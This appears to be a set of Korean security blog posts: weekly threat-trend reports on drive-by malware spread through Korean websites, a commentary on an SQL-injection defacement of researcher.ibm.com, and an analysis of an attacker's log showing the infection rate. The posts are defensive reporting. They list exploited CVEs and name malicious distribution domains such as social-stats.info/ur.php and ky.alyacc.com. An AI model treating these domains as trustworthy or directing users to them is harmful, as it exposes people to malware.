APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다. 대응에 참고 하십시요.

 

사용된 취약성 비율







- CVE 2011-3544 ( 27.8%) Java Applet 취약성 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 12.4%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 (22.7%) Windows Midi 취약성 – 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 전문분석보고서 참고

- CVE 2012-0754 (15.4%) Flash 취약성  

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (12.7%) IE 취약성 ( IE 6,7 대상)

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806


 -CVE 2011-2140 (8.2%) Adobe Flash 취약성

- CVE 2011-1255 (0.4%) IE 취약점

- CVE 2011-2110 (0.08%) Adobe Flash 취약성

 

금주에 이용된 취약성에서는 기존에 적극적으로 이용되던 5가지 가량의 주요 취약성 이외에도 자주 사용되지 않던 IE  Flash 취약성의 활용도 일부 감지 되어 향후 변화가 예상 됩니다.

 



< 6월 1주차 악성링크의 국가별 통계>

금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 및 기관에서는 해당 IP 대역 차단 이후 ( 업무 관련성 여부에 대해서는 각기관 및 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 수 있으시며 매우 높은 수치임을 아실 수 있습니다.



4월부터 차단 권고 드린 IP 대역은 금주에도 계속 재활용이 되었습니다. 강력한 차단을 유지하실 것을 권고 합니다.

 


차단 권고 대역


현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공될 예정입니다.


감사합니다.

 

*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다. 4회 이상을 보고서를 받으셨다면 그 이전에 정식 구독서비스를 신청하셔야 보고서가 누락되지 않습니다.  KAIST CSRC 주간보안동향 보고서는 1p 짜리의 요약형태로 작성이 되며 무료 배포가 가능합니다. 해당 서비스의 신청은csyong95@kaist.ac.kr 로 신청 하시면 됩니다.

 

* 정식 구독 서비스 가입 및 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한정 합니다. 주위의 기업 및 기관들에게 정보 차원의 전달 가능합니다.

 

* 본 분석은 악성링크 자체의 수집은 빛스캔의 PCDS (Pre crime detect system)를 통해  수집하며, 악성링크 및 악성코드 분석은 KAIST 사이버보안연구센터, 정보보호대학원과 공동으로 진행합니다.

 

Posted by 바다란

5 3주차 국내 인터넷 위협 동향입니다.

 

서비스의 제공은 국내에서 발생되는 악성코드 유포에 대해 직접적으로 분석을 함으로써 위험의 흐름과 대응에 대해서 있도록 하기 위한 것이 주된 목적입니다.

 

금주의 특징으로는 공격에 이용되는 취약성 종류의 변화에 따라 공격 기법들도 변화가 되고 있음을 있으며, 가장 특징은 신규 악성링크는 줄어든 비율을 보이고 있으나, 악성링크로부터 감염이 되는 악성코드들은 전주 대비 대폭 증가 되었습니다결론적으로 보면 지금까지 사용 되어진 악성링크들을 반복해서 재활용을 하고 있으며 최종 설치되는 악성코드들만 변경하는 형태를 보이고 있습니다.  대응이 되지 않고 있어서 계속 악성링크를 재활용 하고 있다는 가장 원인이 것입니다.

 

금주의 특징은 다음과 같습니다.

 

 

특징

 

·   악성코드 유포자들의 전략적 행위 증가 범위 확대

·   악성코드 분석 자체를 방해하기 위한 가상머신 우회기술 적용

·   4월부터 사용되었던 주요 악성링크의 대규모 재활용 계속

·   주말에 집중된 공격에서 벗어나 주중에도 일상적인 악성코드 유포 시도들이 계속 이어짐

·   악성링크 탐지 혼선을 위한 백신과 유사한 도메인 활용 배너 

·   APT 유형 ( 악성 코드 감염 이후 내부망 스캔 활동) 꾸준히 유포

·  Mass sql i 유형 국내 유입 시작social-stats.info/ur.php 5.19 ( 해외에는 있었으나 국내로 최초 유입이 감지됨)

 

5 3주차의 공격에 이용된 취약성들을 전주와 비교해 보면 공격자들의 전략과 악성코드 전파 기법의 변화에 대해서 확인이 가능합니다.

금주의 주된 공격 취약성은  주요 취약성 6 가량에 집중이 되어 있으며 이중 여전히 패치가 더딘 것으로 보이는 Oracle Java 취약성에 대한 공격 비율이 높아지고 있는 있습니다. 사내 해당 기관이나 기업에 강력한 보안패치 권고를 해야만 하는 이유입니다. MS 패치뿐 아니라 java Flash 대한 기본 패치 정보를 제공하고 타이트 하게 관리 해야 위험을 줄일 있을 것입니다.

 

특징들을 하나씩 짚어 보면 가장 특징은 전략적 움직임을 공격그룹이 보이고 있다는 부분입니다.

 

·  전략적 변화를 하는 공격자들

악성링크의 수치는 줄었지만 기존에 정상적인 웹서비스들에 추가해둔 악성링크 ( 악성코드는 내려 오지 않는 비정상 링크 ) 대규모로 활용 하였고 그중 한곳의 경우에는 분석보고서에는 정황이 기술되어 있지만 빛스캔에서 관찰되는 변화를 보면 대규모 움직임을 보이고 있습니다.   하나의 악성링크를 이용하여 대규모로 악성코드 유포에 활용 하고 있으며 이전 사용 되었던 링크들의 재사용 비율이 대폭 증가하고 있습니다. 대응이 시급한 상황입니다.

 

말로서는 설명이 어려워 그림으로 보면 다음과 같습니다.

 

1. 공격자는 사전에 악성링크 A B,C 여러 서비스들에 넣어 둡니다. 이때에는 악성코드 유포는 발생하지 않습니다. ( 빛스캔 관측결과 최소 4 이상의 사전에 심어진 악성링크 활동이 감지 되었으며 해당 링크의 내용은 공격 시작과 동시에 동일한 악성코드 호스팅 주소로 변경이 되었습니다. - 최소 연결된 공격네트워크만 40여곳 이상이 해당 되는걸로 감지 되고 있습니다.)

 

2. 공격 시점에 도달 하여서 공격자는 악성링크 A B, C 내용을  악성링크로 변경 합니다.

 

3. 이미 공격자가 확보하여 가지고 있는 악성코드 유포 네트워크( 최소 수십여개 이상 ) 하나의 악성링크를 방문자들에게 중계하게 됩니다.

 



 

·  백신 도메인으로 가장한 형태의 악성링크 발견  (ky.alyacc.com )

·  시스템 드라이버를 대체하는 형태의 루트킷은 APT 형태이며 감염 이후 내부망을 스캔하고 정보를 수집하는 형태를 보이고 있습니다. 해당 형태는 몇주간 계속해서 나타나고 있어서 강도 높은 주의가 필요합니다.

·  악성코드 분석시에는 항상 가상머신을 이용하여 분석을 진행하고 있습니다만 금주에 발견된 악성코드 중에는 가상머신 실행을 감지하고 종료하거나 분석을 회피하도록 설계된 악성코드가 대량 유포 되었습니다. 내용은 향후 전문분석을 통해 상세하게 전달이 예정입니다.

·  게임 계정을 해킹 하는 코드들이 대량으로 유포 되고 있으며 대상 게임은  엔씨 -리니지 , 한게임 -테라 , 넥슨 -메이플스토리,엘소드, 블리자드-와우, CJ인터넷 - 피파온라인, 네오플-던파 이며 디아블로에 대한 계정 탈취 유형도 발견 것으로 보입니다.

·  항상 말씀드리지만 루트킷 또는 APT 유형은 감염 즉시 심각한 피해를 장기적으로 유발 있으므로 심각한 주의가 필요합니다. 더군다나 보고서에 기술되는 내용들은 이메일등을 이용한 소규모 침투가 아니라 웹서비스를 통한 대량 유포 감염입니다.  APT 형태가 사용하는 유포 취약성은 대부분 Java 취약성에 집중 되고 있습니다.  대응에 참고 하십시요.

 

사용된 취약성

 

- CVE 2011-3544 ( 26.4%)  Java Applet 취약성 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

- CVE 2012-0507 ( 24.5%) Java Applet 취약성 - Java Web start 취약성

- CVE 2012-0003 ( 20.7%) Windows Midi 취약성http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0003 3월의 전문분석보고서를 참고 

- CVE 2012-0754 (16.9%)  Flash 취약성http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0754

- CVE 2010-0806 (10.3%)  IE 취약성 ( IE 6,7 대상http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

- CVE 2011-2140 (0.9%)   Flash 취약성  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2140

 

 

전주 대비 특이 사항으로는 Java applet 취약성을 노린 공격이 대폭 증가 하였고 한동안 소강 상태를 보였던 Windows Midi 관련된 공격이 급증세를 보이고 있습니다.또한 오랜된 취약성으로 분류되고 있는 IE 취약성 CVE-2010-0806 공격이 드물게 활성화 되어 이용이 되고 있습니다. MS 관련 보안패치 Oracle, Flash 업데이트를 시급하게 보완해야 부분이며 불가피한 경우 현재 공격에 주로 이용 되고 있는 취약성들에 대해서만이라도 패치를 별도 설치 하도록 유도해야 위험을 줄일 있습니다.

 

전주와 대비해 달라진 취약성 비율과 공격의 자세한 변화들에 대해서는 5 3주차 동향분석 보고서를 참고 하십시요.

 

 

금주의 차단 추가 영역은 다음과 같습니다. 아래 영역은 이미 공격자가 권한을 통제하고 있는 IP 대역들이며 해당 IP 대역들은 이전 리스트에서도 계속 재활용이 되고 있습니다. 기업 기관에서는 해당 IP 대역 차단이후 ( 업무 관련성 여부에 대해서는 각기관 기업별 검토 필요) 차단 수치에 대해서 살펴 보시면 현재 상태의 위험이 얼마나 되는지 실감 하실 있으시며 매우 높은 수치임을 아실 있습니다.

 

 

 

차단 권고 대역

 

 

서비스를 구독 하고 계시는 기업 기관에게는 메일 상에 적어 드렸으며 4월부터 5 2주차까지의 차단 영역은 그대로 유지, 금주에 추가된 영역은 2 클래스가 추가 되었습니다.

 

 

현재 공격자들도 전략적인 움직임을 보이고 있어서 공개적으로 IP 대역을 알리는 부분은 보고서 구독 고객에게만 한정하여 제공할 예정이며 기본 동향에 대해서만 알려 드립니다.

시설 확장을 통해 동안 국내 도메인 추가 확보된 도메인과 해외 도메인을 추가하여 악성링크의 움직임에 대해 폭넓은 관찰을 예정하고 있습니다. 보다 정확성 있고 현실적인 위협정보들을 제공 있도록 하겠습니다.

 

*시범 서비스는 순차적으로 1개월 경과시 종료 됩니다.

* 정식 구독 서비스 가입 시범 서비스 신청은 info@bitscan.co.kr 이며 기관명/ 담당자/ 연락처 기재가 필요하며 시범은 기관/기업별 1회에 한하여 한달간 제공 됩니다.

 

* 분석은 악성링크 자체의 수집은 빛스캔에서 수행하며, 악성링크에 분석은 KAIST 사이버보안센터,  KAIST 정보보호대학원과 공동협력으로 운영 되고 있습니다.

 



< 5 3주차 주간 동향 요약 보고서>

Posted by 바다란

5.18일 researcher.ibm.com 메인 페이지 변조, SQL Injection에 의한 권한 획득


웹서비스 보안에 대해서 문제점과 대응방식의 변화에 대해 이야기를 한지는 아주 오래되었고 지금도 계속 하고 있다. 그러나 변화는 멀었고 아직 인식도 멀리 있는 상태이다.


문제 해결을 위해 security service를 기획하고 제안 했지만 결국에는 아무도 나서지 않아 직접 할 수 밖에 없었던 지금과 관련된 이야기다. 오늘자 기사로 researcher.ibm.com과 같은 중요 서비스에 대한 직접 해킹과 전 세계에서 가장 점유율이 높은 웹 취약성 진단 도구인 Appscan의 주인이 IBM 이라는 점은 심각한 시사점을 던져 주고 있다. 또한 필자 본인이 본 관점이 정확했음을 입증하고 있다.




< zone-h 의 researcher.ibm.com 미러 페이지>


* SQL Injection을 이용했다는 것은 시스템의 권한 획득은 물론 취약성 자체가 DB의 권한을 통해 웹서버를 통제함으로써 DB의 내용도 모두 통제 하고 있다는 것과 동일하다. 페이지 변조에만 관심을 두어서는 안된다. 지금 이런 유형의 일들은 항상 그리고 거대 규모로 일상적으로 일어나고 있는 위험들이다. 만약 변조가 없었다면 내부 침입으로 이어 졌을 것임은 당연한 일이 아닐까? 이것이 모든 기업과 기관, 국가들이 직면한 딜레마이다.



스캔 서비스의 현재 최대 덕목은  정확하고 가급적 많은 취약성의 진단으로 판정을 하고 있다. 그러나 과연 이것이 적합한 것인가? 질문에 대한 답을 볼 수 있는 사건이다. 언제나 발생 할 수 밖에 없는 그런 일들이지만 말이다.


IBM은 현재 가장 정확하고 방대한 Application scanner인 Appscan을 보유중이고 전 세계적으로 점유율도 높으며 판매도 강화하고 있는 Application Security의 주력 제품이다.


Appscan을 이용해 미국방부 및 기업들의 보안성을 강화 시켜 주는데 정작 아이러니컬 한것은 researcher.ibm.com 리서처 사이트는 Application 취약성에 의해 권한 획득을 당했다는 점이다.


< 미 국방부의 3단계 어플리케이션 보안 강화를 위한 SDLC 모델>

* 2006년 부터 진단과 수정, 보완이 시작된 것으로 알고 있지만 현재까지도 진척률은 미미하다. 그리고 진단이 완료된 서비스들은 한번도 변화하지 않았을까?. ^^; 딜레마이며 이 문제로 인해 2011년 미공군은 빠른 속도가 장점인 별도의 진단 스캐너를 공식적으로 도입한다. 완벽한 프로세스의 정착이 그만큼 어려우며 또한 현재의 SDLC 모델은 최소한 Web application에 대해서는 맞는 모델이 아니라는 입증된 결과를 보여주고 있을 뿐이다.


단 하나의 웹 서비스라면 문제는 다르다. 완벽하게 관리를 하고 체계적으로 또 실험적으로 적용 할 수 있을 것이다. 그러나 수십, 수백여개의 웹서비스를 관리해야 하는 회사나 담당 부서라면 과연 무엇을 해야 하는가? 또 무엇이 가장 필요한가?.


웹서비스의 절대과제는 널리 사용자들에게 서비스를 알리고 접점의 역할을 하는 것이지만 지금은 다른 용도로도 널리 쓰이고 있다. ( 공격자에 의해 악성코드 전파의 수단으로 이용됨.)  이미 악성코드 유포에 이용이 된다는 점은 웹서비스의 소스코드 변경을 전제로 한다. 소스코드의 변경은 권한을 가지고 있을때에만 가능하다. 매주 마다 수백여개 이상의 웹서비스들에서 무시하지 못할 수치의 악성코드들이 뿌려지고 있는 상황에서 과연 그 서비스를 운영하는 기업들은 자신의 서비스에서 악성코드를 뿌리고 있다는 것을 알기나 할까?


웹서비스의 현재 보안수준을 직접 확인 할 수 있는가?

웹서비스 진단은 언제 끝났으며 그 사이 변화나 갱신은 한번도 없었는가?  ( CEO나 회장님 지시로 한시간 만에 급조한 페이지나 이벤트들은 없었을까? .. 의문이다. 의문)

외부에서 접속이 가능한 웹 서비스들은 대체 얼마나 있으며 그 모든 것들에 대해 안전한 상태를 유지 하고 있는가?


웹서비스의 보안성 유지는 절대적인 미션이다. 그 미션의 유지에 기본이 되는 것은 100%에 가까운 보안성을 유지하는 것이 아니다. 분명히 말하지만 항상 보안성을 100% 가까이 유지 하는 것은 불가능에 가깝다.  보안 전문업체를 활용해도 마찬가지 이다. 그 원인의 첫번째는 보안도구들의 한계와 웹의 잦은 변화를 따라 갈 수 없는 현실에서 기인한다.


잦은 변화를 따라가면서 현재 전체 서비스에 대한 수준을 일정 수준 이상 유지해야 하는 절대적인 생존 법칙이 있다.  

 * 여기서의 일정 수준은 자동화된 공격 도구들에 의해서는 손쉽게 당해서는 안되는 것이며, 또한 알려진 취약성에 대해서도 기본적인 대책이 되어야 함을 의미한다. 


수준의 유지와 전체 외부 노출 서비스에 대한 관리를 위해 우리는 보안 진단 스캐너와 수많은 보안 컨설팅, 관제 등의 서비스들을 활용하고 진단 인력을 동원한다. 그중에서 진단 스캐너의 목적은 100%에 가까운 진단이 가능한 것도 있어야 하지만 모든 것에 대한 일정수준 유지에는 극명한 한계를 가지고 있어서 불가능한 면이 많다. 그렇다면 일정수준 유지를 위해서는 무엇이 필요한가?


수준유지를 위해 필요한 포인트는 정확하고 많은 취약성의 진단이 아니라 가장 빠르고 손쉽게 점검이 가능한가?..접근성은 좋은가?, 결과는 명쾌한가? 웹 서비스 개발속도에 전혀 영향을 주지 않을만큼 빠르고 심플한가가..핵심이 되어야 가능해 진다.



긴 점검 시간과 복잡한 결과, 사전만한 사이즈의 결과 리포트 ( 어떨때 보면 전문가들도 가르치려 하는 그런 뉘앙스를 느낄 때도 있다. )로는 현재의 문제를 극복하지 못한다. 문제의 핵심을 직시해야 한다.


현황:  

- 웹 서비스는 변화가 많다. ( 잦은 변경)

- 보안 취약성을 제대로 이해하는 개발자도 부족하고 진단 보고서를 이해하는 개발자는 더욱 적다.


위의 현황은 현실에서는 부정 할 수 없는 내용이다. 전문가들 조차도 제대로 이해를 못하는 상황에서 개발자들까지 이해를 한다는 것은 뜬구름일 뿐이다.  특히 한국의 경우 웹 개발은 개발 프로젝트로 제대로 인정 하지 않으며 모든 업무에서 기한의 압박과 하찮은 일이라는 시선 같은 이중고에 시달리고 있다. 이 상황에서 보안을 하라는 것은 불가능에 가깝다. 특히 사전과 같은 두께의 보고서와 처음보는 낯선 용어들의 나열은 좌절감을 극대화 시킬 뿐이다.



현실:


- 고객사들은 100%에 가까운 모든 취약성을 진단하고 제거 하기를 희망한다. 

- 스캐너들은 점점 더 무거워지고 어쩌면 공격도구에 가까운 기법들을 사용한다.

- 점점 더 진단 보고서들은 난해해지고 두꺼워 진다. 그래야 전문성 있게 보이나 보다.

- 모든 웹서비스들을 진단 하는데에는 엄청난 시간과 인력, 비용이 소요된다. 그래서  샘플링으로 진단을 할 수 밖에 없다.


- 즉 일년에 한번 진단 하기도 힘든 웹서비스들은 늘어만 간다.

- 진단을 받아도 외부 노출된 웹 서비스들중 방문자가 많은 사이트, 중요하다고 생각되는 사이트만을 선정하여 진단을 한다.



현실에서의 문제와 요구사항들은 문제해결과는 다른 길로 인도하고 있다. 만약 충분한 전문인력을 보유하고 있고 비용에 대해 부담이 없는 기업이라면 얼마든지 전체에 대해 100% 가까운 진단과 수준을 유지하는 것에 기꺼이 박수친다. 그러나 문제를 직시해 보자.  보안진단 비용이 웹서비스 개발과 운영 비용 보다도 휠씬 더 많이 소요 된다면 과연 그 웹서비스를 계속 유지 하는 것이 합당 할까? .. 이 질문에 대해 답을 할 수 있어야 한다. 모든 문제를 풀때 정답에 가까운 것은 비용 대비 효과가 충분한가 하는점이다.  



문제의 직시:


- 웹 서비스는 수시로 변경 되고 갱신된다. 작은 변경에도 DB까지 직접 공격 당하는 취약성은 언제든지 발생 될 수 있다.


- 많은 웹서비스들이 있는 회사라면 전체의 상황을 일정 수준 유지 할 수 있어야 한다. 외부 노출된 모든 서비스들이 대상이 되어야만 한다.


- 진단보고서들을 이해하고 적용 할 수 있는 사람이 없다. 그냥 보고서만 받고 묵혀둔다. 일단은 면피용이다.


- 취약성 스캐너의 사용과 결과를 이해 할 수 있는 사람이 내부에 없다.  ( 즉 보고서가 나와도 해독불가의 상황)


- 중요한 서비스의 기준은 방문자가 많은 서비스가 아니라 외부 노출된 모든 서비스가 중요하다. ( 모든 서비스는 내부망으로 이어져 있다. )



결론적으로는 이렇다.


문제의 핵심은 웹 서비스의 잦은 변화에도 손쉽게 사용 할 수 있고 결과도 직관적이며 접근성도 매우 높은 심플한 보안서비스가 절대적으로 필요하다는 것.  100%를 추구하는 것은 1~2년에 한번씩 진행해도 된다. 그와는 별개의 수준 유지를 위한 도구나 서비스가 필요하다는 점이다. 


정말 중요한 것은 10개의 서비스중 4개는 100%이고 나머지 6개는 50% 미만이라면 그 기업의 안전도는 50% 미만인 것이다. 평균은 가장 보안 수준이 낮은 서비스가 평균이 된다. 우린 이 평균을 끌어 올려야 손쉽게 당하지 않으며 일정 수준의 관리가 가능해 지는 것이다. 모든 것은 연결 되어 있다. DMZ Zone에 포함된 서버들, DB에 접근이 가능한 모든 웹서비스들은 치명적이다. 방문자가 많고 중요도에 따라 우선 순위를 정하는 것은 아무런 의미가 없다는 점이다. 가장 관리가 안되는 서비스의 해킹은 상대적으로 쉬울 것이다. 또 그 서비스와 연결된 내부망은 어떻게 보호 할 수 있을까? 


IBM의 해킹을 보면서 ( 역설적이게도 가장 잘 진단한다고 하는 취약성에 의해 당했다.) 처음 서비스 모델의 진단서비스를 기획할 수 밖에 없었던 5~6년전의 경험들이 눈앞에 떠올라 길게 써본다. 


강력한 보안 진단 제품을 가지고 있는 IBM 조차도 전체의 일정수준 유지에는 어려움을 겪고 있다. 이 상황에서 일반 기업들이 유지 할 수 있을 것이라는 점은 상식을 벗어난다. 필자가 개발한 서비스에 대한 언급도, 설명도 할 필요가 없다. 그 필요성과 존재 이유를 가장 잘 설명해 주는 예가 눈 앞에 있는데 무엇을 더 설명 해야 할까?


입 아프게 말을 할 필요가 없다. 앞으로도 계속 될 문제들이며, 우린 아직 정리도 못한 상황이다. 즉 계속 될 문제라는 점은 확실하다. 


* 한국내에서도 일정 규모 이상의 공공 사업에는 Secure coding을 적용 한다고 한다. 그 Secure coding 이라는 것은 진단 스캐너 보다도 호흡이 긴 작업이다. C/S 베이스의 코딩에 대해서는 강력하게 추천하나 이 Secure coding이 웹 베이스까지 확장 되는 것에 대해서는 우려를 표시 할 수밖에 없다. 어플리케이션 진단 스캐너 조차도 수준 유지와 꾸준한 관리가 어려운 판국에 더 긴 주기를 가진 것으로 보호를 하겠다는 것은 넌센스감도 되지 않는다. 현실을 모르면 배는 산에 올라가도 산이 산인줄을 모른다. 지금이 그 상황이다. 


Secure coding은 권고로 하되 전체의 외부 노출 서비스를 일정수준 유지하고 체크 할 수 있는 지수의 운용, 효율적 점검 방안의 수립이 휠씬 더 필요한 상황이다.




-바다란



Posted by 바다란

 * 본 내용은 국내에서 처음으로 발견된 공격자의 악성코드 감염에 대한 성공률을 나타내는 최초의 자료이며, 현 시점의 정확한 데이터를  포함하고 있습니다. 

하루에 좀비 PC를 몇대를 만들 수 있는지는 단지 공격자의 의지에 달렸을 뿐인 지금의 상황을 정확하게 보시길 바랍니다. 방문자 10명중 6명이 감염이 되는 지금의 시대는 말 그대로 혼란이겠죠. 겉으로는 평온해 보여도 속으로는 매우 심각한 상태인데 이제 언제든 밖으로 드러나도 이상하지 않은 상황이 되어 버렸습니다.

우리의 인터넷의 현 주소입니다. 방문만 하여도 열에 여섯은 감염 되는 현실이 중세의 페스트가 아니고 무엇일까요? . 예전에 지디넷 컬럼으로 썼던 디지털 페스트의 현실화를 입증하는 데이터네요.

자..그럼~
 -----------------
 

국내의 웹 서비스를 통한 악성코드 유포와 감염에 대한 실태 – 2012 2 11일 사례 조사

분석 기업: 빛스캔 , KAIST 정보보호대학원

 

 

2012 1월부터 빛스캔㈜에서는 KAIST 사이버보안연구센터와 공동으로 웹 서비스상에서의 악성링크 판별과 사용자 PC에 설치되는 최종 악성코드에 대해서 분석을 진행해 오고 있다. 공동 분석을 진행 중 2012년 들어 악성코드 유포 행위가 가장 극심했던 2 11일 새벽에 공격자가 생성한 흔적(로그)을 발견하게 되었고, 이 로그에는 유포 시간대에 접속한 모든 사용자에 대한 기록들이 저장이 되어 있었다. 로그를 분석한 결과 국내에서 몇 년 전부터 꾸준하게 발생되어 오고 있는 웹서비스를 통한 악성코드 유포가 얼마나 많은 효과를 거두고 있으며 왜 지금도 멈추지 않고 계속 되고 있는지를 확인 할 수 있었다. 211일 새벽 3시간 동안 발생된 기록의 단면을 통해 국내의 악성코드 유포에 대한 피해여파와 대책의 효율성에 대해 고려해야 할 시점이다.

 

일반적으로 공격자들은 공격의 효과와 유효성 검증을 위해 접속자에 대한 로그를 항상 유료화된 통계 사이트로 전달해 오고 있어서 공격의 효과를 대응 측면에서 판단하는 것이 매우 어렵고 공격의 전체적인 규모를 파악하는 것이 불가능하였다. 또한 여러 사이트를 동시에 해킹 하고 악성코드 유포를 시도한 이후에 통계 사이트를 통해 관리와 기록을 함으로써 공격의 효율성을 높이고 있는 상황에서 실질적인 공격의 피해와 범위를 살펴 보는 것은 사실상 불가능한 부분이라 할 수 있다.  본 분석의 결과로 국내에서 일상적으로 발생 되고 있는 웹 서비스를 통한 악성코드 유포의 심각성에 대해 환기가 되었으면 한다.
 

<공격자들이 주로 사용하는 통계 사이트 – Referer 체크를 통해 접속자 실시간 관찰>

 

2 10일부터 12일까지(3) 최근 몇 년 이내에 가장 큰 규모로 다양한 악성코드를 유포한 주말기간 이였으며 이 당시에 발견된 악성 링크들만 30여 종 이상이고 특히 하나의 악성링크가 50여 곳 이상의 웹서비스들에서 중계되는 사례도 발견이 된 시기이다. 이번에 발견된 공격흔적은 이 중에서도 소규모에 해당하는 서비스들을 공격하여 감염을 시킨 흔적들이며 중소 언론사 한곳과 게임 커뮤니티 사이트 두 곳의 방문자들에게만 감염이 되도록 되어 있었다. 다른 큰 규모의 공격들에 대해서도 분석이 된다면 국내의 실질적인 현실에 대해서 보다 더 정확하게 인지 할 수 있겠으나 공격자의 실수가 없다면 파악을 한다는 것은 절대적으로 불가능한 사안이다. 우리는 이 작은 사례를 통해서 국내의 IT환경에 대한 직접적인 위험을 인지해야 하며 적극적인 대책을 적용 해야만 할 시기에 직면했음을 알아야 할 것이다. 전체의 피해 사례는 더 크고 대규모 일 수 밖에 없다. 지금 이 순간에도 말이다.

 

로그파일의 사이즈는 55M , 활성화된 시간은 2012 2 11 00:23:46 ~ 03:24:30 이며 총 3시간에 걸친 기록이다. 총 로그의 카운트는 270,384회이다.

 

중복된 방문자를 제외한 Unique IP의 수치 통계는 다음과 같다. ( AWSTAT 활용한 통계)

 

Summary

 

Reported period

Month Feb 2012

First visit

11 Feb 2012 - 00:23

Last visit

11 Feb 2012 - 03:24

 

Unique visitors

Number of visits

Pages

Hits

Bandwidth

Viewed traffic *

56,995

57,380
(1 visits/visitor)

125,210
(2.18 Pages/Visit)

126,606
(2.2 Hits/Visit)

1.01 GB
(18.38 KB/Visit)

Not viewed traffic *

36,517

143,776

158.92 MB




웹로그 27만 여개 중에서 고유 방문자는 56,995명이며 해당 방문자들은 평균 2회 가량의 페이지를 자동으로 방문한 것으로 나오고 있다.

고유 방문자가 실제 감염 대상으로 볼 수 있으며 해당 악성링크 사이트에 존재하는 exe 파일을 제한 없이 사용자 PC에 설치된 횟수가 악성코드 감염 PC 갯수로 판단할 수 있다.



최종 고유 방문자 대비 성공 비율은 60%선을 보이고 있다. 결론적으로 소규모 사이트 두 곳 만을 이용한 공격이며 더구나 새벽시간대의 3시간 가량의 악성링크 노출만으로도 공격 성공률 60% 34천대 이상의 좀비 PC를 확보 하고 있음을 증명하고 있다. 방문자가 더 많은 대규모 사이트들에 대한 공격도 이 시기에 동시적으로 발생 하였으므로 감염 수치는 추산하기 어려울 정도이며 놀랄 만큼 많은 대규모 좀비 PC를 확보 하고 있을 것으로 추정이 가능하다.

 유포된 악성파일 자체는 게임계정 탈취와 키로깅을 주목적으로 하고 있으며 국내 주요 백신에서는 탐지가 되지 않음을 확인 하였다. 공격 코드는 IE 버전별 Flash 취약성, IE 자체의 취약성, Windows Media Player 취약성, Oracle Java 관련 취약성이 활용 되었으며 본 로그 상에서는 Oracle Java 관련 취약성 공격 성공률은 1385회 정도를 보이고 있다. 그 외의 IE, Flash 취약성과 Windows Media Player관련 취약성 공격이 공격 성공의 대부분을 차지하고 있음을 알 수 있다.


< 방문자의 취약성별 악성코드 감염 구조도(예시)  >

 

사용자의 Flash 버전 및 IE의 버전, java, Windows Media player에 대한 공격코드가 각각 방문자의 PC환경에 맞추어서 공격이 발생되도록 되어 있고 최종적으로는 악성파일을 방문자 PC에 설치하여 좀비 PC로 만드는 것을 목적으로 하고 있다. 공격된 취약성의 종류는 다음과 같다.

 

사용 취약점(CVE)

CVE-2012-0003 MIDI Remote Code Execution Vulnerability

CVE-2011-3544 Oracle Java Applet Rhino Script Engine Remote Code Execution

CVE-2011-2140 Adobe Flash Player MP4 sequenceParameterSetNALUnit Vulnerability

CVE-2010-0806 IE Remote Code Execution Vulnerability

 

좀비 PC를 만들기 위해 공격자들은 환경에 맞는 공격코드들을 세트 형식으로 운용을 하고 있으며 방문자의 다양한 PC 환경에 맞추어 여러 취약성들을 나누어서 공격하도록 되어 있다. 최종적으로는 악성코드의 설치에 여러 취약성을 이용하는 형태를 띄고 있다. 더구나 이 모든 악성코드들은 국내의 사용 비율이 높은 백신들에 대해서는 이미 우회 테스트를 한 상태에서 내려와서 실시간 대응은 매우 어려운 환경이며 악성코드 파일 자체가 다운로드 된 것은 제한 없이 방문자 PC를 좀비 PC화 했다는 것을 의미한다. 각 취약성에 대한 보안업데이트들은 충분히 나와 있으나 현재 상태에서도 국내의 일반적인 PC 환경은 업데이트 미비로 인한 피해도가 매우 높음을 알 수 있다. 업데이트가 출현한 상태에서도 성공률이 60%인데, 업데이트도 나오지 않은 제로데이 공격이면 성공률은 90% 이상으로 높아질 것으로 보인다. 그러나 현재 상태에서도 충분히 공격자는 소기의 목적을 달성 하고 있다고 볼 수 있다.

 

l  분석 데이터

 


접속횟수의 기준은 레퍼러(Referer)를 기준으로 한 수치이며 중소 IT 전문 언론사를 통한 새벽 시간대의 유입도 상당히 높은 수준임을 볼 수 있다. 더불어 게임 커뮤니티의 접속은 공격 시작 시간이 새벽임에도 불구하고 접속률은 매우 높은 통계를 보이고 있다.



동 시간대의 접속 국가별 통계는 다음과 같다.


<접속 IP 통계 >

국내 IT관련 언론사 한 곳과 국내의 게임 커뮤니티 사이트에 대한 공격이라 92% 이상의 접근 IP가 국내의 IP임을 확인 할 수 있다. 방문자들의 운영체제 비율은 95.2% 가량이 Windows 운영체제임을 보이고 있다.

 


악성링크에 연결된 브라우저별 접근 정보는 다음과 같다.



여전히 국내에서는 Windows 플랫폼과 Internet Explorer의 사용비율이 높음을 볼 수 있다. 그리고 본 통계치는 공격자에 의해 수집된 로그를 기반으로 하였고 특정 커뮤니티와 제한된 시간이라는 제약이 있어서 전체적인 평균을 대변 하기는 어려움이 있는 자료이다.  최근 공격 동향으로는 Flash에 대한 공격이 매우 자주 발생 되고 있고 계속 변화되고 있어서 비단 IE Windows 의 사용비율이 높다고 하여 감염이 높은 것으로 보기에도 어려움이 있다.

 

